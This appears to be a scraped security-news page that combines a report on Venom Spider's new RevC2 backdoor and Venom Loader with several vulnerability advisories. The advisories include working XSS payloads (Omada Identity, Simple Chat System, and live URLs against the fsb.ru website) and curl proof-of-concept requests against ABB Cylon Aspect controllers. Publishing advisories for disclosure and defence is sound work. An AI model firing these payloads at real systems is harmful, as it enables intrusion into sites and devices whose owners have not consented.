A novel backdoor malware and a loader that customizes payload names for each victim have been added to the threat group's cybercriminal tool set.

Source: Photo Spirit via Shutterstock

A known threat actor in the malware-as-a-service (MaaS) business known as "Venom Spider" continues to expand capabilities for cybercriminals who use its platform, with a novel backdoor and loader detected in two separate attacks in a recent two-month period.

Researchers at Zscaler ThreatLabz uncovered campaigns between August and October of this year that leveraged a backdoor called called RevC2, as well as a loader called Venom Loader, in attacks that use known MaaS tools from Venom Spider (aka Golden Chickens), according to a blog post published Dec. 2.

RevC2 uses WebSockets to communicate with its command-and-control (C2) server and can steal cookies and passwords, proxy network traffic, and enable remote code execution (RCE). Venom Loader meanwhile uses the victim's computer name to encode payloads, thus customizing them for each victim as an extra personalization tactic.

Venom Spider is a threat actor known for offering various MaaS tools such as VenomLNK, TerraLoader, TerraStealer, and TerraCryptor that are widely used by groups such as FIN6 and Cobalt for cyberattacks. In fact, FIN6 was seen leveraging Venom Spider's MaaS platform in October, in a spear-phishing campaign spreading a novel backdoor dubbed "more\_eggs" capable of executing secondary malware payloads.

Related:Ransomware's Grip on Healthcare

**Even "More\_Eggs"**

That platform apparently has been enhanced yet again, this time with two new malware families observed in recent phishing campaigns. RevC2, observed by researchers in a campaign that occurred from August to September, used an API documentation lure to deliver the novel payload.

The attack began with with a VenomLNK file that contains an obfuscated batch (BAT) script that when executed downloads a PNG image from the website hxxp://gdrive\[.\]rest:8080/api/API.png. The PNG image aims to lure the victim with a document that is titled "APFX Media API Documentation."

Upon execution, RevC2 used two checks for specific system criteria and then executed only if they both pass, to ensure it's launched as part of an attack chain, and not in analysis environments such as sandboxes.

Once launched, the backdoor's capabilities include the ability to: communicate with the C2 using a C++ library called "websocketpp"; steal passwords and cookies from Chromium browsers; take screenshots of the victim's system; proxy network data using the SOCK5 protocol; and execute commands as a different user using the stolen credentials.

A second campaign occurring between September and October used a cryptocurrency lure to deliver Venom Loader, which in turn spread a JavaScript backdoor providing RCE capabilities that the researchers dubbed "More\_eggs lite." The malware is so-named because it has fewer capabilities than the previously discovered "more\_eggs," ThreatLabz security researcher Muhammed Irfan V A noted in the post.

Related:2 UK Hospitals Targeted in Separate Cyberattacks

"Although it is a JS backdoor delivered via VenomLNK, the variant only includes the capability to perform RCE," he wrote.

One notable feature of Venom Loader is that the DLL file it used in the observed campaign is custom built for each victim and is used to load the next stage, according to ThreatLabz.

The loader is downloaded from :hxxp://170.75.168\[.\]151/%computername%/aaa, "where the  %computername% value is an environment variable which contains the computer name of the system," Irfan V A wrote.

Venom Loader then uses %computername% as the hardcoded XOR key to encode its stages of attack, which in this case executes the More\_eggs lite backdoor for attackers to carry out RCE.

**MaaS Capabilities Expected to Expand**

ThreatLabz believes that the new malware included in Venom Spider's MaaS platform "are early versions, and expect more features and anti-analysis techniques to be added in the future," Irfan V A wrote.

Zscaler detected the malware using both a sandbox and its cloud security platform, which detected the following threat-name indictors related to the campaign: LNK.Downloader.VenomLNK; Win32.Backdoor.RevC2; and Win32.Downloader.VenomLoader.

Related:Incident Response Playbooks: Are You Prepared?

Zscaler also is providing a Python script that emulates RevC2's WebSocket server on its GitHub repository as well as included a long list of indicators of compromise (IoCs) in the blog post so defenders can check their respective organization's systems for evidence of the malware.         

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Venom Spider Spins Web of New Malware for MaaS Platform

This paper provides an in-depth technical explanation, illustration, and verification of discovered attacks affecting PlayReady on Windows 10 / 11 x64 that pertain to Warbird deficiencies, content key sniffer operation, magic XOR keys discovery, white-box crypto attack, and complete client identity compromise attacks.

Microsoft Warbird and PMP Security Research

A newly discovered malware campaign has been found to target private users, retailers, and service businesses mainly located in Russia to deliver NetSupport RAT and BurnsRAT.
The campaign, dubbed Horns&Hooves by Kaspersky, has hit more than 1,000 victims since it began around March 2023. The end goal of these attacks is to leverage the access afforded by these trojans to install stealer

Horns&Hooves Campaign Delivers RATs via Fake Emails and JavaScript Payloads

Omada Identity versions prior to 15U1 and 14.14 hotfix #309 suffer from a persistent cross site scripting vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20241127-0 >  
=======================================================================  
              title: Stored Cross-Site Scripting  
            product: Omada Identity  
 vulnerable version: <v15U1, <v14.14 hotfix #309  
      fixed version: v15U1, v14.14 hotfix #309  
         CVE number: CVE-2024-52951  
             impact: Medium  
           homepage: https://omadaidentity.com/products/omada-identity/  
              found: 2024-03-20  
                 by: Daniel Hirschberger (Office Bochum)  
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Omada Identity is a modern, enterprise-ready IGA solution that is deployed  
on-premises, giving you full control over your data and security. Our solution  
is easy to use, highly customizable, and gives you complete visibility into your  
environment without having to write a single line of code but is completely  
customizable to address any requirement. With built-in automation features,  
Omada Identity can help you streamline your workflows, improve efficiency, and  
strengthen your security posture."

Source: https://omadaidentity.com/products/omada-identity/

Business recommendation:  
------------------------  
Upgrade to version v15U1 or install hotfix #309 for v14.14.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting (CVE-2024-52951)  
An authenticated user can inject JavaScript in the "Request Reason". The  
injected JavaScript code will be executed if another user looks at the "History"  
of this access request. An attacker can then execute arbitrary JavaScript  
in the browser of other users which could for example be used for phishing attacks.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting (CVE-2024-52951)  
An authenticated user can submit an access request and has to specify a reason why  
the access should be provided.

<1-1_request_access.png>

This request has to be intercepted and modified, e.g.:  
--------------------------------------------------------------------------------  
POST /workitemdlg.aspx?ACTTEMP=XXX&RURLID=YYY HTTP/1.1  
Host: $SERVER  
Cookie: oissessionid=$MYSESSION  
[...]  
Content-Type: application/x-www-form-urlencoded

[...]  
1000104=Need+hello+access+and+bigfun<iframe+src=javascript:alert(document.domain)></iframe>&1000102=I+would+like+to+request+access+to+%5Bspecify+system%5D+so+I+can+perform+my+%5Bspecify+duties%5D+duties+related+to+my+work+as+a+%5Bspecify+position%5D.  
[...]  
--------------------------------------------------------------------------------

Afterwards, anyone who reviews the "History" of this access request will be  
affected by the stored JavaScript code. Users who review the history requests are  
usually managers who have to approve this request, so this vulnerability allows  
reliably affecting higher-privileged users.

<1-2_trigger_xss.png>

Vulnerable / tested versions:  
-----------------------------  
The following version of the on-prem solution has been tested which was the latest  
version available at the time of the test:  
* 14.0.14.36

Previous versions of v14.14 hotfix #309 are affected according to the vendor, as  
well as <v15U1.

Vendor contact timeline:  
------------------------  
2024-04-08: Contacting vendor through contract@omadaidentity.com; no response.  
2024-04-24: Contacting vendor through contract@omadaidentity.com and  
            info@omadaidentity.com; no response.  
2024-05-06: Contacting vendor through their "Contact Us" form;  
            We were contacted by Sales and forwarded the email to them.  
2024-05-08: CISO contacts us, we sent the advisory via provided Sharepoint  
            link.  
2024-05-13: Vendor confirms security issues. XSS is fixed now and hotfixes  
            are created for their releases.  
            Second finding was disputed and seems to be a misconfiguration.  
            Removed issue 2 from advisory.  
2024-05-27: Asking for a status update regarding XSS hotfixes.  
2024-05-27: Vendor: May cloud update is scheduled for 29th May. On-prem  
            release version v15U1 is planned for 12th June. Hot-fix for on-prem  
            version 14.14 is also planned for 12th June.  
2024-06-17: Asking if Hotfix is released  
2024-06-21: Vendor: Hotfix #309 for v14.14 is released  
2024-06-24: Vendor: asks if we are satisfied with the follow-up  
            We agree and respect the wish to delay the publication of the  
            advisory for at least one month.  
2024-10-08: Asking vendor regarding CVE assignment.  
2024-10-11: Vendor is waiting for internal confirmation regarding next steps,  
            update hopefully next week.  
2024-10-08: Asking for a status update, whether we should assign a CVE.  
2024-10-31: Vendor responds with calculated CVSS vectors and asks for  
            our opinions;  
            We agree that the CVSS Base Score looks correct and ask to  
            clarify if they want to register the CVE themselves or if  
            we as a CNA should register it for them.  
2024-11-18: Received CVE number from vendor;  
            We provide our CVE details to the vendor and ask them  
            to update the CVE entry.  
2024-11-22: Vendor notifies us about the CVE update, gives us a  
            green light for the publication and thanks us for our  
            cooperation;  
            We mention that we will publish it in the following week  
            and also thank the vendor.  
2024-11-27: Release of security advisory.

Solution:  
---------  
Upgrade to version v15U1 or install hotfix #309 for v14.14.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2024

Omada Identity Cross Site Scripting

ABB Cylon Aspect version 3.08.00 suffers from a vulnerability in the fileSystemUpdate.php endpoint of the ABB BEMS controller due to improper handling of uploaded files. The endpoint lacks restrictions on file size and type, allowing attackers to upload excessively large or malicious files. This flaw could be exploited to cause denial of service (DoS) attacks, memory leaks, or buffer overflows, potentially leading to system crashes or further compromise.

    ABB Cylon Aspect 3.08.00 (fileSystemUpdate.php) Insecure File UploadVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.00Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: A vulnerability exists in the fileSystemUpdate.php endpoint of theABB BEMS controller due to improper handling of uploaded files. The endpointlacks restrictions on file size and type, allowing attackers to upload excessivelylarge or malicious files. This flaw could be exploited to cause Denial-of-Service(DoS) attacks, memory leaks, or buffer overflows, potentially leading to systemcrashes or further compromise.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5866Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5866.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl --path-as-is -X POST "http://192.168.73.31/fileSystemUpdate.php" \> -H "Content-Type: multipart/form-data; boundary=----J0X" \> -H "Accept-Encoding: gzip, deflate, br" \> -H "Cookie: PHPSESSID=xxx" \> -d "------J0X\> Content-Disposition: form-data; name=\"userfile\"; filename=\"test.aam\"\> Content-Type: application/octet-stream\> \> 5GB_CONTENT\> ------J0X--\> "HTTP/1.1 302 FoundStrict-Transport-Security: max-age=31536000; includeSubdomainsExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheLocation: fileSystemUpdateExecuteDisplay.php?file=test.aamContent-type: text/html; charset=UTF-8Content-Length: 0Date: Thu, 28 Nov 2024 15:05:44 GMT

ABB Cylon Aspect 3.08.00 fileSystemUpdate.php File Upload / Denial Of Service

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose various BACnet MS/TP statistics running on the device.

  
ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated information  
disclosure vulnerability. An unauthorized attacker can reference the affected  
page and disclose various BACnet MS/TP statistics running on the device.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5865  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5865.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl http://192.168.73.31/mstpstatus.php  
Thu Nov 28 10:13:51 UTC 2024<br><div id='Port 0Stat' class='portStats'><div id='Port 0Load'>Port 0 Load: 123    Average time (ms) to wait for token return  
47      Average time (ms) to wait for for a reply  
20      Max info frames  
1063    Estimated time for max_nfo_frmaes tx plus token cycle (ms)  
18      Estimated max rate (trasactions per sec)  
38      congestion threashold  
%</div><div id='Port 0BPSTotal'>Port 0 BPS (Total): </div><div id='Port 0BPSOurs'>Port 0 BPS (Mine): </div></div><div id='Port 1Stat' class='portStats'><div id='Port 1Load'>Port 1 Load: 34    Average time (ms) to wait for token return  
40      Average time (ms) to wait for for a reply  
20      Max info frames  
834     Estimated time for max_nfo_frmaes tx plus token cycle (ms)  
23      Estimated max rate (trasactions per sec)  
48      congestion threashold  
%</div><div id='Port 1BPSTotal'>Port 1 BPS (Total): </div><div id='Port 1BPSOurs'>Port 1 BPS (Mine): </div></div><br />  
$Id: mstp.ko R_03_05_01 Thu Sep 23 09:30:32 EDT 2021 $ <br />  
Proto:          0<br />  
<br />  
Port 0 Statistics =======================<br />  
Baud Rate:        38400<br />  
RX Characters:     60521<br />  
RX echoes:         0<br />  
RX Errors:         31<br />  
TX Characters:     49671<br />  
Echo detect fails: 0<br />  
<br />  
Port 0 MSTP State =======================<br />  
ValidRXFrameCnt:   42320<br />  
InvdRXFrameCnt:    61<br />  
rxDataFrames:      16558<br />  
rxToken:           29242<br />  
TXFrameCnt:        2072<br />  
TXQueCnt:          1<br />  
CongestionCnt:     0<br />  
Poll_Station:      0<br />  
SoleMaster:        FALSE<br />  
<br />  
Port 0 config =======================<br />  
Nmax_master:       127<br />  
Nmax_info_frames:  20<br />  
This_Station:      0<br />  
Tno_token:         500<br />  
Tusage timeout     30<br />  
congestion (auto): 38<br />  
Npoll:             50<br />  
<br />  
<br />  
Port 1 Statistics =======================<br />  
Baud Rate:        38400<br />  
RX Characters:     0<br />  
RX echoes:         0<br />  
RX Errors:         0<br />  
TX Characters:     33632<br />  
Echo detect fails: 0<br />  
<br />  
Port 1 MSTP State =======================<br />  
ValidRXFrameCnt:   0<br />  
InvdRXFrameCnt:    0<br />  
rxDataFrames:      0<br />  
rxToken:           0<br />  
TXFrameCnt:        2<br />  
TXQueCnt:          0<br />  
CongestionCnt:     0<br />  
Poll_Station:      29<br />  
SoleMaster:        TRUE<br />  
<br />  
Port 1 config =======================<br />  
Nmax_master:       127<br />  
Nmax_info_frames:  20<br />  
This_Station:      0<br />  
Tno_token:         500<br />  
Tusage timeout     30<br />  
congestion (auto): 48<br />  
Npoll:             50<br />  
<br />

ABB Cylon Aspect 3.08.01 mstpstatus.php Information Disclosure

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose various protocol thread information running on the device.

    ABB Cylon Aspect 3.08.01 (diagLateThread.php) Information DisclosureVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an unauthenticated informationdisclosure vulnerability. An unauthorized attacker can reference the affectedpage and disclose various protocol thread information running on the device.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5864Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5864.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -s http://192.168.73.31/diagLateThread.php | findstr /spina:d "Summary Thread"7:    <title>Thread Class Status</title>47:        #ProjectThreadStatus {127:        var url ='//192.168.73.31/jsonProxy.php?port=7226&application=StatusServlet&query=showTimerThreadPoolStatus%3Dtrue%26descending%3Dtrue%26responseFormat%3Djson';128:        var directUrl ='//192.168.73.31:7226/servlets/StatusServlet?showTimerThreadPoolStatus=true&descending=true&responseFormat=json';203:            $.getJSON(url, processThreadInfo);204:            //$.getJSON(directUrl, processThreadInfo);248:            //infoText = "<div><h2 class='summaryHeading'>"+targetClass+" Class Summary</h2></div><div class='hideable'><div class='summaryInfo'></div>306:        function processThreadInfo(json) {308:            getClassStats(json, PUP_STR, pupLateTime, "PUPLateTable", "pupSummary");309:            getClassStats(json, BACNET_STR, bacnetLateTime, "BACnetLateTable", "bacnetSummary");310:            getClassStats(json, SDP_STR, sdpLateTime, "SDPLateTable", "sdpSummary");311:            getClassStats(json, SCHEDULE_STR, scheduleLateTime, "ScheduleLateTable", "scheduleSummary");312:            getClassStats(json, DEFAULT_STR, defaultLateTime, "DefaultLateTable", "defaultSummary");315:            $("#ProjectThreadStatus").empty();316:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'><h2>Thread Status at " + systemTime.toTimeString() + "</h2></div>");317:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Timers: " + json.totalTimers + "</div>");318:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Targets: " + json.totalTargets + "</div>");323:            var warningTime = (timebase * 1000) * threadWarnPercent;324:            var errorTime = (timebase * 1000) * threadErrorPercent;534:    <div id="ProjectThreadStatus"></div>537:        <div class='infoSection ThreadDiv' id="bacnetInfo">538:            <div id="bacnetHeading"><h2>BACnet Summary</h2>541:                    <div id="bacnetSummary"></div>550:        <div class='infoSection ThreadDiv' id="pupInfo">551:            <div id="pupHeading"><h2>PUP Summary</h2>554:                    <div id="pupSummary"></div>563:        <div class='infoSection ThreadDiv' id="sdpInfo">564:            <div id="sdpHeading"><h2>SDP Summary</h2>567:                    <div id="sdpSummary"></div>576:        <div class='infoSection ThreadDiv' id="scheduleInfo">577:            <div id="scheduleHeading"><h2>Schedule Summary</h2>580:                    <div id="scheduleSummary"></div>589:        <div class='infoSection ThreadDiv' id="defaultInfo">590:            <div id="defaultHeading"><h2>Default Summary</h2>593:                    <div id="defaultSummary"></div>

ABB Cylon Aspect 3.08.01 diagLateThread.php Information Disclosure

Simple Chat System version 1.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    #Exploit Title:Simple Chat System 1.0#Reflected XSS#Date:05/12/2024#Exploit Author:Merve Hatice Arslan#Vendor Homepage:https://code-projects.org/simple-chat-system/#Sofware Link:https://download.code-projects.org/details/ec6340ea-ef68-48d9-b9b2-da397f52b2dc#Version:1.0#Tested on:Linux / XAMPP#Scripting (XSS) in user.php via the name and username fields.#Payload:<img src=1 href=1 onerror="javascript:alert(1)"></img>

Simple Chat System 1.0 Cross Site Scripting

The Russian FSB appears to suffer from a cross site scripting vulnerability. The researchers who discovered it have reported it multiple times to them.

/*!  
- # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation  
- # Authenticated Persistent XSS  
- # GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query=  
- # DATE: 2024-11-29  
- # SECURITY RESEARCHER:  E1.Coders  
- # VENDOR: FSB [ http://www.fsb.ru/ ]  
- # SOFTWARE LINK: http://www.fsb.ru/  
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C  
- # CWE: CWE-79  
*/

  ### -- [ Info: ]

 [i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.

 [i] Vulnerable parameter(s): sh.htm?query=  < AND >  /fsb/sh.htm?query=

  ### -- [ Impact: ]

 [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

  ### -- [ Payloads: ]

 `"'><img src=xxx:x \x22onerror=javascript:alert(1)>

 "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />

 `"'><img src=xxx:x onerror\x09=javascript:alert(1)>

  ### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E

 http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E

